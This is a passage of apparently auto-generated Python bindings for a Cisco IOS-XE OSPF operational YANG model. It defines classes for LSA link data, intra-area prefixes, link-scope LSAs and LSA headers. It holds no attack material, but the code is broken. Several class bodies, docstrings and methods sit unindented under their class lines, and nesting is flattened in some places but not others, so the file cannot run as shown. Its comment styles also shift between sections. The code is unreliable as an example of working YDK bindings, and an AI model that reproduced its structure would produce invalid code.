        ('e_flag', (YLeaf(YType.boolean, 'e-flag'), ['bool'])),
    ])
    self.e_flag = None
    self._segment_path = lambda: "flags"
    self._is_frozen = True  # later attribute writes are routed through __setattr__ below
def __setattr__(self, name, value):
    # Generated hook: forward writes plus the settable leaf-name list to the Entity base machinery.
    self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal.Flags, ['e_flag'], name, value)
class LinkData(Entity):
"""
OSPFv3 Link data
.. attribute:: rtr_priority
Router priority of the interce
**type**\: int
**range:** 0..255
**config**\: False
.. attribute:: link_local_interface_address
The originating router's link\-local interface address on the link
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: num_of_prefixes
Number of prefixes
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: lsa_id_options
Link data LSA options
**type**\: :py:class:`Ospfv3LsaOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaOptions>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
    """Install generated YANG metadata and leaf storage for the 'link-data' container."""
    super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.LinkData, self).__init__()
    self.yang_name = "link-data"
    self.yang_parent_name = "lsa-body"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    self.ylist_key_names = []  # container, not a keyed list
    self._child_classes = OrderedDict([])  # leaf-only node: no child containers
    # link-local-interface-address accepts two string forms (IPv4 or IPv6 per the docstring patterns)
    self._leafs = OrderedDict([
        ('rtr_priority', (YLeaf(YType.uint8, 'rtr-priority'), ['int'])),
        ('link_local_interface_address', (YLeaf(YType.str, 'link-local-interface-address'), ['str','str'])),
        ('num_of_prefixes', (YLeaf(YType.uint32, 'num-of-prefixes'), ['int'])),
        ('lsa_id_options', (YLeaf(YType.bits, 'lsa-id-options'), ['Bits'])),
    ])
    self.rtr_priority = None
    self.link_local_interface_address = None
    self.num_of_prefixes = None
    self.lsa_id_options = Bits()
    self._segment_path = lambda: "link-data"
    self._is_frozen = True  # later attribute writes are routed through __setattr__ below
def __setattr__(self, name, value):
    # Generated hook: forward writes plus the settable leaf-name list to the Entity base machinery.
    self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.LinkData, ['rtr_priority', 'link_local_interface_address', 'num_of_prefixes', 'lsa_id_options'], name, value)
class IaPrefix(Entity):
"""
OSPFv3 Intra area prefixes
.. attribute:: referenced_ls_type
Referenced Link State type
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: referenced_link_state_id
Referenced Link State ID
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: referenced_adv_router
Referenced Advertising Router
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: num_of_prefixes
Number of prefixes
**type**\: int
**range:** 0..65535
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
    """Install generated YANG metadata and leaf storage for the intra-area 'ia-prefix' container."""
    super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.IaPrefix, self).__init__()
    self.yang_name = "ia-prefix"
    self.yang_parent_name = "lsa-body"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    self.ylist_key_names = []  # container, not a keyed list
    self._child_classes = OrderedDict([])  # leaf-only node: no child containers
    # referenced-adv-router accepts two string forms (IPv4 or IPv6 per the docstring patterns)
    self._leafs = OrderedDict([
        ('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])),
        ('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])),
        ('referenced_adv_router', (YLeaf(YType.str, 'referenced-adv-router'), ['str','str'])),
        ('num_of_prefixes', (YLeaf(YType.uint16, 'num-of-prefixes'), ['int'])),
    ])
    self.referenced_ls_type = None
    self.referenced_link_state_id = None
    self.referenced_adv_router = None
    self.num_of_prefixes = None
    self._segment_path = lambda: "ia-prefix"
    self._is_frozen = True  # later attribute writes are routed through __setattr__ below
def __setattr__(self, name, value):
    # Generated hook: forward writes plus the settable leaf-name list to the Entity base machinery.
    self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.IaPrefix, ['referenced_ls_type', 'referenced_link_state_id', 'referenced_adv_router', 'num_of_prefixes'], name, value)
class Ospfv3Link(Entity):
"""
OSPFv3 links
.. attribute:: interface_id (key)
Interface ID
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: neighbor_interface_id (key)
Neighbor interface ID
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: neighbor_router_id (key)
Neighbor router ID
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: type
Link type
**type**\: int
**range:** 0..255
**config**\: False
.. attribute:: metric
Metric
**type**\: int
**range:** 0..65535
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
    """Install generated YANG metadata and leaf storage for the 'ospfv3-link' list entry (triple-keyed)."""
    super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Link, self).__init__()
    self.yang_name = "ospfv3-link"
    self.yang_parent_name = "area-scope-lsa"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    # Composite YANG list key: all three leaves together identify an entry
    self.ylist_key_names = ['interface_id','neighbor_interface_id','neighbor_router_id']
    self._child_classes = OrderedDict([])  # leaf-only node: no child containers
    self._leafs = OrderedDict([
        ('interface_id', (YLeaf(YType.uint32, 'interface-id'), ['int'])),
        ('neighbor_interface_id', (YLeaf(YType.uint32, 'neighbor-interface-id'), ['int'])),
        ('neighbor_router_id', (YLeaf(YType.uint32, 'neighbor-router-id'), ['int'])),
        ('type', (YLeaf(YType.uint8, 'type'), ['int'])),
        ('metric', (YLeaf(YType.uint16, 'metric'), ['int'])),
    ])
    self.interface_id = None
    self.neighbor_interface_id = None
    self.neighbor_router_id = None
    self.type = None
    self.metric = None
    # XPath segment carries all three key predicates
    self._segment_path = lambda: "ospfv3-link" + "[interface-id='" + str(self.interface_id) + "']" + "[neighbor-interface-id='" + str(self.neighbor_interface_id) + "']" + "[neighbor-router-id='" + str(self.neighbor_router_id) + "']"
    self._is_frozen = True  # later attribute writes are routed through __setattr__ below
def __setattr__(self, name, value):
    # Generated hook: forward writes plus the settable leaf-name list to the Entity base machinery.
    self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Link, ['interface_id', 'neighbor_interface_id', 'neighbor_router_id', 'type', 'metric'], name, value)
class Ospfv3Prefix(Entity):
    """
    OSPFv3 prefix\-list
    .. attribute:: prefix  (key)
    Prefix
    **type**\: str
    **config**\: False
    .. attribute:: prefix_options
    Prefix options
    **type**\: str
    **config**\: False
    """

    # YANG module metadata consumed by the ydk runtime.
    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        """Set up ydk bookkeeping and leaf storage for one ospfv3-prefix list entry."""
        super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Prefix, self).__init__()
        self.yang_name = "ospfv3-prefix"
        self.yang_parent_name = "area-scope-lsa"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        # Leaf that forms this YANG list's key.
        self.ylist_key_names = ['prefix']
        self._child_classes = OrderedDict([])
        # Leaf name -> (YLeaf descriptor, accepted Python type names).
        self._leafs = OrderedDict([
            ('prefix', (YLeaf(YType.str, 'prefix'), ['str'])),
            ('prefix_options', (YLeaf(YType.str, 'prefix-options'), ['str'])),
        ])
        self.prefix = None
        self.prefix_options = None
        # Relative XPath segment, including the list-key predicate.
        self._segment_path = lambda: "ospfv3-prefix" + "[prefix='" + str(self.prefix) + "']"
        # NOTE(review): assigned last by generator convention; appears to freeze
        # attribute creation — confirm against ydk Entity.
        self._is_frozen = True

    def __setattr__(self, name, value):
        """Route attribute writes through ydk's validating setter."""
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Prefix, ['prefix', 'prefix_options'], name, value)
class Ospfv3IaPrefix(Entity):
    """
    OSPFv3 intra\-area prefix\-list
    .. attribute:: prefix  (key)
    Prefix
    **type**\: str
    **config**\: False
    .. attribute:: prefix_options
    Prefix options
    **type**\: str
    **config**\: False
    """

    # YANG module metadata consumed by the ydk runtime.
    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        """Set up ydk bookkeeping and leaf storage for one ospfv3-ia-prefix list entry."""
        super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3IaPrefix, self).__init__()
        self.yang_name = "ospfv3-ia-prefix"
        self.yang_parent_name = "area-scope-lsa"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        # Leaf that forms this YANG list's key.
        self.ylist_key_names = ['prefix']
        self._child_classes = OrderedDict([])
        # Leaf name -> (YLeaf descriptor, accepted Python type names).
        self._leafs = OrderedDict([
            ('prefix', (YLeaf(YType.str, 'prefix'), ['str'])),
            ('prefix_options', (YLeaf(YType.str, 'prefix-options'), ['str'])),
        ])
        self.prefix = None
        self.prefix_options = None
        # Relative XPath segment, including the list-key predicate.
        self._segment_path = lambda: "ospfv3-ia-prefix" + "[prefix='" + str(self.prefix) + "']"
        # NOTE(review): assigned last by generator convention; appears to freeze
        # attribute creation — confirm against ydk Entity.
        self._is_frozen = True

    def __setattr__(self, name, value):
        """Route attribute writes through ydk's validating setter."""
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3IaPrefix, ['prefix', 'prefix_options'], name, value)
class LinkScopeLsas(Entity):
"""
List OSPF link scope LSA
.. attribute:: lsa_type (key)
OSPF link scope LSA type
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: link_scope_lsa
List of OSPF link scope LSAs
**type**\: list of :py:class:`LinkScopeLsa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa>`
**config**\: False
.. attribute:: area_scope_lsa
List OSPF area scope LSA databases
**type**\: list of :py:class:`AreaScopeLsa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
    """Set up ydk bookkeeping, child lists, and leaf storage for one link-scope-lsas entry."""
    super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas, self).__init__()
    self.yang_name = "link-scope-lsas"
    self.yang_parent_name = "ospf-instance"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    # Leaf that forms this YANG list's key.
    self.ylist_key_names = ['lsa_type']
    # Child YANG name -> (python attribute, binding class) map.
    self._child_classes = OrderedDict([("link-scope-lsa", ("link_scope_lsa", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa)), ("area-scope-lsa", ("area_scope_lsa", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa))])
    # Leaf name -> (YLeaf descriptor, accepted Python type names).
    self._leafs = OrderedDict([
        ('lsa_type', (YLeaf(YType.uint32, 'lsa-type'), ['int'])),
    ])
    self.lsa_type = None
    self.link_scope_lsa = YList(self)
    self.area_scope_lsa = YList(self)
    # Relative XPath segment, including the list-key predicate.
    self._segment_path = lambda: "link-scope-lsas" + "[lsa-type='" + str(self.lsa_type) + "']"
    # NOTE(review): assigned last by generator convention; appears to freeze
    # attribute creation — confirm against ydk Entity.
    self._is_frozen = True
def __setattr__(self, name, value):
    """Route attribute writes through ydk's validating setter."""
    self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas, ['lsa_type'], name, value)
class LinkScopeLsa(Entity):
"""
List of OSPF link scope LSAs
.. attribute:: lsa_id (key)
LSA ID
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: adv_router (key)
Advertising router
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: decoded_completed
The OSPF LSA body is fully decoded
**type**\: bool
**config**\: False
.. attribute:: raw_data
The complete LSA in network byte order as received/sent over the wire
**type**\: list of int
**range:** 0..255
**config**\: False
.. attribute:: version
Version
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: ospfv2_lsa
OSPFv2 LSA
**type**\: :py:class:`Ospfv2Lsa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa>`
**config**\: False
.. attribute:: ospfv2_link
OSPFv2 LSA link
**type**\: list of :py:class:`Ospfv2Link <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Link>`
**config**\: False
.. attribute:: ospfv2_topology
Summary LSA
**type**\: list of :py:class:`Ospfv2Topology <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Topology>`
**config**\: False
.. attribute:: ospfv2_external
External LSA
**type**\: list of :py:class:`Ospfv2External <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2External>`
**config**\: False
.. attribute:: ospfv2_unknown_tlv
OSPFv2 Unknown TLV
**type**\: list of :py:class:`Ospfv2UnknownTlv <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2UnknownTlv>`
**config**\: False
.. attribute:: ospfv3_lsa_val
OSPFv3 LSA
**type**\: :py:class:`Ospfv3LsaVal <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal>`
**config**\: False
.. attribute:: ospfv3_link
OSPFv3 links
**type**\: list of :py:class:`Ospfv3Link <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3Link>`
**config**\: False
.. attribute:: ospfv3_prefix_list
OSPFv3 prefix\-list
**type**\: list of :py:class:`Ospfv3PrefixList <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3PrefixList>`
**config**\: False
.. attribute:: ospfv3_ia_prefix
OSPFv3 intra\-area prefix\-list
**type**\: list of :py:class:`Ospfv3IaPrefix <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3IaPrefix>`
**config**\: False
.. attribute:: multi_topology
OSPF multi\-topology interface augmentation
**type**\: list of :py:class:`MultiTopology <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.MultiTopology>`
**config**\: False
.. attribute:: router_address
Router address
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: tlv
Link TLV
**type**\: :py:class:`Tlv <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Tlv>`
**config**\: False
.. attribute:: unknown_sub_tlv
OSPFv2 Unknown sub TLV
**type**\: list of :py:class:`UnknownSubTlv <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.UnknownSubTlv>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
    """Set up ydk bookkeeping, singleton children, child lists, and leaf storage for one link-scope-lsa entry."""
    super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa, self).__init__()
    self.yang_name = "link-scope-lsa"
    self.yang_parent_name = "link-scope-lsas"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    # Leafs that together form this YANG list's key.
    self.ylist_key_names = ['lsa_id','adv_router']
    # Child YANG name -> (python attribute, binding class) map.
    self._child_classes = OrderedDict([("ospfv2-lsa", ("ospfv2_lsa", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa)), ("ospfv2-link", ("ospfv2_link", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Link)), ("ospfv2-topology", ("ospfv2_topology", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Topology)), ("ospfv2-external", ("ospfv2_external", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2External)), ("ospfv2-unknown-tlv", ("ospfv2_unknown_tlv", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2UnknownTlv)), ("ospfv3-lsa-val", ("ospfv3_lsa_val", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal)), ("ospfv3-link", ("ospfv3_link", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3Link)), ("ospfv3-prefix-list", ("ospfv3_prefix_list", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3PrefixList)), ("ospfv3-ia-prefix", ("ospfv3_ia_prefix", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3IaPrefix)), ("multi-topology", ("multi_topology", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.MultiTopology)), ("tlv", ("tlv", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Tlv)), ("unknown-sub-tlv", ("unknown_sub_tlv", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.UnknownSubTlv))])
    # Leaf name -> (YLeaf descriptor, accepted Python type names);
    # two 'str' entries mark a union of the two address patterns.
    self._leafs = OrderedDict([
        ('lsa_id', (YLeaf(YType.uint32, 'lsa-id'), ['int'])),
        ('adv_router', (YLeaf(YType.str, 'adv-router'), ['str','str'])),
        ('decoded_completed', (YLeaf(YType.boolean, 'decoded-completed'), ['bool'])),
        ('raw_data', (YLeafList(YType.uint8, 'raw-data'), ['int'])),
        ('version', (YLeaf(YType.uint32, 'version'), ['int'])),
        ('router_address', (YLeaf(YType.str, 'router-address'), ['str','str'])),
    ])
    self.lsa_id = None
    self.adv_router = None
    self.decoded_completed = None
    self.raw_data = []
    self.version = None
    self.router_address = None
    # Singleton (presence) children are instantiated eagerly and parented here.
    self.ospfv2_lsa = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa()
    self.ospfv2_lsa.parent = self
    self._children_name_map["ospfv2_lsa"] = "ospfv2-lsa"

    self.ospfv3_lsa_val = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal()
    self.ospfv3_lsa_val.parent = self
    self._children_name_map["ospfv3_lsa_val"] = "ospfv3-lsa-val"

    self.tlv = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Tlv()
    self.tlv.parent = self
    self._children_name_map["tlv"] = "tlv"
    # Repeated children are YLists bound to this parent.
    self.ospfv2_link = YList(self)
    self.ospfv2_topology = YList(self)
    self.ospfv2_external = YList(self)
    self.ospfv2_unknown_tlv = YList(self)
    self.ospfv3_link = YList(self)
    self.ospfv3_prefix_list = YList(self)
    self.ospfv3_ia_prefix = YList(self)
    self.multi_topology = YList(self)
    self.unknown_sub_tlv = YList(self)
    # Relative XPath segment, including the two list-key predicates.
    self._segment_path = lambda: "link-scope-lsa" + "[lsa-id='" + str(self.lsa_id) + "']" + "[adv-router='" + str(self.adv_router) + "']"
    # NOTE(review): assigned last by generator convention; appears to freeze
    # attribute creation — confirm against ydk Entity.
    self._is_frozen = True
def __setattr__(self, name, value):
    """Route attribute writes through ydk's validating setter."""
    self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa, ['lsa_id', 'adv_router', 'decoded_completed', 'raw_data', 'version', 'router_address'], name, value)
class Ospfv2Lsa(Entity):
    """
    OSPFv2 LSA
    .. attribute:: header
    Decoded OSPFv2 LSA header data
    **type**\:  :py:class:`Header <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.Header>`
    **config**\: False
    .. attribute:: lsa_body
    Decoded OSPFv2 LSA body data
    **type**\:  :py:class:`LsaBody <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody>`
    **config**\: False
    """

    # YANG module metadata consumed by the ydk runtime.
    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        """Set up ydk bookkeeping and the two singleton children (header, lsa-body)."""
        super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa, self).__init__()
        self.yang_name = "ospfv2-lsa"
        self.yang_parent_name = "link-scope-lsa"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        # Not a YANG list: no key leafs.
        self.ylist_key_names = []
        self._child_classes = OrderedDict([("header", ("header", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.Header)), ("lsa-body", ("lsa_body", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody))])
        self._leafs = OrderedDict()

        self.header = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.Header()
        self.header.parent = self
        self._children_name_map["header"] = "header"

        self.lsa_body = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody()
        self.lsa_body.parent = self
        self._children_name_map["lsa_body"] = "lsa-body"
        # Container node: plain segment, no key predicates.
        self._segment_path = lambda: "ospfv2-lsa"
        # NOTE(review): assigned last by generator convention; appears to freeze
        # attribute creation — confirm against ydk Entity.
        self._is_frozen = True

    def __setattr__(self, name, value):
        """Route attribute writes through ydk's validating setter."""
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa, [], name, value)


    class Header(Entity):
        """
        Decoded OSPFv2 LSA header data
        .. attribute:: lsa_id
        LSA ID
        **type**\: union of the below types:
        **type**\: str
        **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
        **type**\: str
        **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
        **config**\: False
        .. attribute:: opaque_type
        Opaque type
        **type**\: int
        **range:** 0..255
        **config**\: False
        .. attribute:: opaque_id
        Opaque ID
        **type**\: int
        **range:** 0..4294967295
        **config**\: False
        .. attribute:: age
        LSA age
        **type**\: int
        **range:** 0..65535
        **config**\: False
        .. attribute:: type
        LSA type
        **type**\: int
        **range:** 0..65535
        **config**\: False
        .. attribute:: adv_router
        LSA advertising router
        **type**\: int
        **range:** 0..4294967295
        **config**\: False
        .. attribute:: seq_num
        LSA sequence number
        **type**\: str
        **config**\: False
        .. attribute:: checksum
        LSA checksum
        **type**\: str
        **config**\: False
        .. attribute:: length
        LSA length
        **type**\: int
        **range:** 0..65535
        **config**\: False
        .. attribute:: flag_options
        LSA options
        **type**\:  :py:class:`LsaFlagOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.LsaFlagOptions>`
        **config**\: False
        """

        # YANG module metadata consumed by the ydk runtime.
        _prefix = 'ospf-ios-xe-oper'
        _revision = '2018-02-01'

        def __init__(self):
            """Set up ydk bookkeeping and leaf storage for the header container."""
            super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.Header, self).__init__()
            self.yang_name = "header"
            self.yang_parent_name = "ospfv2-lsa"
            self.is_top_level_class = False
            self.has_list_ancestor = True
            # Not a YANG list: no key leafs.
            self.ylist_key_names = []
            self._child_classes = OrderedDict([])
            # Leaf name -> (YLeaf descriptor, accepted Python type names);
            # two 'str' entries mark a union of the two address patterns.
            self._leafs = OrderedDict([
                ('lsa_id', (YLeaf(YType.str, 'lsa-id'), ['str','str'])),
                ('opaque_type', (YLeaf(YType.uint8, 'opaque-type'), ['int'])),
                ('opaque_id', (YLeaf(YType.uint32, 'opaque-id'), ['int'])),
                ('age', (YLeaf(YType.uint16, 'age'), ['int'])),
                ('type', (YLeaf(YType.uint16, 'type'), ['int'])),
                ('adv_router', (YLeaf(YType.uint32, 'adv-router'), ['int'])),
                ('seq_num', (YLeaf(YType.str, 'seq-num'), ['str'])),
                ('checksum', (YLeaf(YType.str, 'checksum'), ['str'])),
                ('length', (YLeaf(YType.uint16, 'length'), ['int'])),
                ('flag_options', (YLeaf(YType.bits, 'flag-options'), ['Bits'])),
            ])
            self.lsa_id = None
            self.opaque_type = None
            self.opaque_id = None
            self.age = None
            self.type = None
            self.adv_router = None
            self.seq_num = None
            self.checksum = None
            self.length = None
            # Bits-typed leaf holds a ydk Bits container, not None.
            self.flag_options = Bits()
            self._segment_path = lambda: "header"
            # NOTE(review): assigned last by generator convention; appears to freeze
            # attribute creation — confirm against ydk Entity.
            self._is_frozen = True
